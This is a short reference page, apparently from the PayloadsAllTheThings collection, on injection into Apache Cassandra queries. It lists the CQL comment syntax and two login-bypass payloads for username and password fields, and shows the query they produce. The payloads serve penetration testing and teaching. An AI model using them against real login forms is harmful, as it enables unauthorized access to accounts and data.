PayloadsAllTheThings/SQL Injection/Cassandra Injection.md
2020-10-09 12:45:28 +05:30

44 lines
896 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Cassandra Injection
> Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system
## Summary
* [Cassandra comment](#cassandra-comment)
* [Cassandra - Login Bypass](#cassandra---login-bypass)
* [Login Bypass 0](#login-bypass-0)
* [Login Bypass 1](#login-bypass-1)
* [References](#references)
## Cassandra comment
```sql
/* Cassandra Comment */
```
## Cassandra - Login Bypass
### Login Bypass 0
```sql
username: admin' ALLOW FILTERING; %00
password: ANY
```
### Login Bypass 1
```sql
username: admin'/*
password: */and pass>'
```
The injection would look like the following SQL query
```sql
SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;
```
## References
* [Injection In Apache Cassandra Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/)